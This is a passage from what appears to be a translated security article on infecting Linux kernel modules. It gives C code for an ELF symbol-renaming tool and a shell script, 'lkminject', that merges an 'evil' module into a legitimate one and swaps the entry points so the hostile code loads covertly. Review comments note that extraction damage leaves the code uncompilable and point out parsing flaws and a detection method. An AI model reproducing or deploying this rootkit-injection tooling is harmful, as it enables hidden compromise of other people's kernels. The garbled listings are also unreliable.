exit (EXIT_FAILURE);
}
symoffset = ElfGetSymbolByName (fd, &symtab, &strtab, argv[2], &sym);
if (symoffset == -1)
{
fprintf (stderr, "Symbol %s not foundn", argv[2]);
exit (EXIT_FAILURE);
}
printf ("[ ] Symbol %s located at 0x%xn", argv[2], symoffset); if (fseek (fd, symoffset, SEEK_SET) == -1)
FATAL ("fseek"); if (fwrite (argv[3], 1, strlen(argv[3]), fd) < strlen (argv[3]))
FATAL ("fwrite"); printf ("[ ] .strtab entry overwriten with %sn", argv[3]); fclose (fd); return EXIT_SUCCESS;
} /* closes the function that begins before this excerpt */
/*
 * ElfGetSymbolByName: walk the symbol table described by symtab, read each
 * Elf32_Sym into *sym, fetch its name from strtab through ElfGetSymbolName,
 * and return the value ElfGetSymbolName produced for the first entry whose
 * name equals `name`. Returns -1 when no entry matches; on a match *sym
 * holds the matching entry.
 *
 * NOTE(review): this listing lost characters in extraction. The loop
 * increment prints as "i )" and the offset arithmetic as
 * "sh_offset (i * ...)"; presumably these were "i++" and a "+", but the
 * text as printed does not compile.
 *
 * NOTE(review): the entry count is sh_size / sh_entsize with no check that
 * sh_entsize is non-zero, and neither value is compared with the file size
 * in this function. If symtab was filled from an untrusted file (the caller
 * is outside this excerpt), a zero sh_entsize divides by zero.
 *
 * NOTE(review): the return type is Elf32_Off, so the -1 sentinel is
 * converted to that type; confirm the caller's comparison against -1
 * accounts for it.
 */
Elf32_Off ElfGetSymbolByName (FILE *fd, Elf32_Shdr *symtab,
Elf32_Shdr *strtab, char *name, Elf32_Sym *sym)
{
int i;
/* Fixed-size buffer for one symbol name; cleared before every lookup below. */
char symname[255];
Elf32_Off offset; for (i=0; i<(symtab->sh_size/symtab->sh_entsize); i )
{
/* Position on entry i of the symbol table, then read exactly one entry. */
if (fseek (fd, symtab->sh_offset (i * symtab->sh_entsize),
SEEK_SET) == -1)
FATAL ("fseek"); if (fread (sym, sizeof (Elf32_Sym), 1, fd) < 1)
FATAL ("Symtab corrupted"); memset (symname, 0, sizeof (symname));
/* st_name is taken from the file and passed on unchecked as the name's
 * position inside the string table. */
offset = ElfGetSymbolName (fd, sym->st_name,
strtab, symname, sizeof (symname));
if (!strcmp (symname, name))
return offset;
} return -1;
}
/*
 * ElfGetSectionByIndex: seek to the section header numbered `index` and
 * read one Elf32_Shdr into *shdr. Always returns 0; seek and read failures
 * go through FATAL, which is defined outside this excerpt.
 *
 * NOTE(review): the offset expression prints as "e_shoff (index * ...)";
 * an operator (presumably "+") was lost in extraction, so the line does not
 * compile as shown.
 *
 * NOTE(review): index is not compared with ehdr->e_shnum here, and e_shoff
 * and e_shentsize are used as given. With a malformed header the only
 * safety net visible in this function is the fseek/fread failure path.
 */
int ElfGetSectionByIndex (FILE *fd, Elf32_Ehdr *ehdr, Elf32_Half index,
Elf32_Shdr *shdr)
{
if (fseek (fd, ehdr->e_shoff (index * ehdr->e_shentsize),
SEEK_SET) == -1)
FATAL ("fseek"); if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1)
FATAL ("Sections header corrupted"); return 0;
}
/*
 * ElfGetSectionByName: read the section header string table, then read each
 * of the e_shnum section headers into *shdr and compare its name with
 * `section`. Returns 0 with *shdr holding the matching header, or -1 when
 * no name matches (in which case *shdr holds the last header that was read).
 *
 * NOTE(review): the loop increment prints as "i )" and the offset as
 * "e_shoff (i * ...)"; characters were lost in extraction and the code does
 * not compile as shown.
 *
 * NOTE(review): `name` is cleared once, before the loop, whereas
 * ElfGetSymbolByName clears its buffer on every iteration. Whether bytes
 * from an earlier, longer name can survive into a later comparison depends
 * on how ElfGetSectionName terminates the string - confirm.
 */
int ElfGetSectionByName (FILE *fd, Elf32_Ehdr *ehdr, char *section,
Elf32_Shdr *shdr)
{
int i;
/* Fixed-size buffer for one section name. */
char name[255];
Elf32_Shdr shstrtable; /*
* Get the section header string table
*/
/* e_shstrndx is used as given; the return value of ElfGetSectionByIndex is
 * not checked (it only ever returns 0). */
ElfGetSectionByIndex (fd, ehdr, ehdr->e_shstrndx, &shstrtable); memset (name, 0, sizeof (name)); for (i=0; i<ehdr->e_shnum; i )
{
if (fseek (fd, ehdr->e_shoff (i * ehdr->e_shentsize),
SEEK_SET) == -1)
FATAL ("fseek"); if (fread (shdr, sizeof (Elf32_Shdr), 1, fd) < 1)
FATAL ("Sections header corrupted"); ElfGetSectionName (fd, shdr->sh_name, &shstrtable,
name, sizeof (name));
if (!strcmp (name, section))
{
return 0;
}
}
return -1;
}
/*
 * ElfGetSectionName: seek into the section header string table at the
 * position given by sh_name and copy bytes from the file into res, one
 * fgetc() at a time. Always returns 0; a failed seek goes through FATAL,
 * which is defined outside this excerpt.
 *
 * NOTE(review): the listing is damaged here. The seek offset prints as
 * "sh_offset sh_name" (operator lost), the loop condition prints as
 * "(i < len)" followed by a broken "*res == '" fragment, and the two
 * increments print as "i ;" and "res ;". The exact loop condition cannot be
 * recovered from this text.
 *
 * NOTE(review): independent of the damaged condition, the visible body
 * stores fgetc()'s result straight into a char without testing for EOF, and
 * nothing after the loop writes a terminator. Callers pass
 * sizeof(buffer) as len and then strcmp() the buffer, so a name that fills
 * all len bytes would leave it unterminated.
 */
int ElfGetSectionName (FILE *fd, Elf32_Word sh_name,
Elf32_Shdr *shstrtable, char *res, size_t len)
{
size_t i = 0; if (fseek (fd, shstrtable->sh_offset sh_name, SEEK_SET) == -1)
FATAL ("fseek"); while ((i < len)
*res == ')
{
*res = fgetc (fd);
i ;
res ;
} return 0;
}
/*
 * ElfGetSymbolName: seek into the string table at the position given by
 * sym_name, copy bytes from the file into res one fgetc() at a time, and
 * return an Elf32_Off built from strtable->sh_offset and sym_name. A failed
 * seek goes through FATAL, which is defined outside this excerpt.
 *
 * NOTE(review): the listing is damaged here. Both "sh_offset sym_name"
 * expressions lost their operator (presumably "+", which would make the
 * return value the file offset of the name), the loop condition prints as
 * "(i < len)" followed by a broken "*res == '" fragment, and the increments
 * print as "i ;" and "res ;". The code does not compile as shown.
 *
 * NOTE(review): as in ElfGetSectionName, the visible body stores fgetc()'s
 * result into a char without testing for EOF and writes no terminator after
 * the loop, while the caller passes sizeof(buffer) as len and then calls
 * strcmp() on the buffer.
 */
Elf32_Off ElfGetSymbolName (FILE *fd, Elf32_Word sym_name,
Elf32_Shdr *strtable, char *res, size_t len)
{
size_t i = 0; if (fseek (fd, strtable->sh_offset sym_name, SEEK_SET) == -1)
FATAL ("fseek"); while ((i < len)
*res == ')
{
*res = fgetc (fd);
i ;
res ;
} return (strtable->sh_offset sym_name);
}
/* EOF */

----] 9.2 Lkminject

#!/bin/sh
#
# lkminject by truff (truff@projet7.org)
#
# Injects a Linux lkm into another one.
#
# Usage:
# ./lkminfect.sh original_lkm.o evil_lkm.c
#
# Notes:
# You have to modify evil_lkm.c as explained below:
# In the init_module code, you have to insert this line, just after
# variables init:
# dumm_module ();
#
# In the cleanup_module code, you have to insert this line, just after
# variables init:
# dummcle_module ();
#
#
# NOTE(review): this listing was damaged in extraction. Several commands are
# run together on one line, the elfstrchange paths print as ".../", and the
# line after the blank line below lost its leading "#". As printed it is not
# a runnable script.

http://www.projet7.org" - Security Researchs -
###########################################################################
# The two sed passes rewrite the source file named by $2 in place, going
# through a scratch file called tmp in the current directory. $1 and $2 are
# used unquoted throughout.
sed -e s/init_module/evil_module/ $2 > tmp
mv tmp $2 sed -e s/cleanup_module/evclean_module/ $2 > tmp
mv tmp $2 # Replace the following line with the compilation line for your evil lkm
# if needed.
# What the remaining steps leave behind, as far as these lines show: the
# combined object still carries the names dumm_module and dummcle_module in
# its string table, and the final mv replaces the file named by $1. Comparing
# an installed module's hash or symbol list with the packaged original
# therefore shows the change.
make ld -r $1 $(basename $2 .c).o -o evil.o .../elfstrchange evil.o init_module dumm_module
.../elfstrchange evil.o evil_module init_module
.../elfstrchange evil.o cleanup_module dummcle_module
.../elfstrchange evil.o evclean_module cleanup_module mv evil.o $1
rm elfstrchange

|=[ EOF ]=---------------------------------------------------------------=|

译者的话: 这篇文章总的来说还是比较容易懂的. 原文标题是<感染LKM>. 旅团的Bytes兄弟说
不如"注射"来得贴切, 采纳之. 感谢alert7大哥的建议, 保留了section的专有名称. 感谢各位
旅团兄弟的支持. 最后感谢chaton, 我占用了她的老公好几天^_^




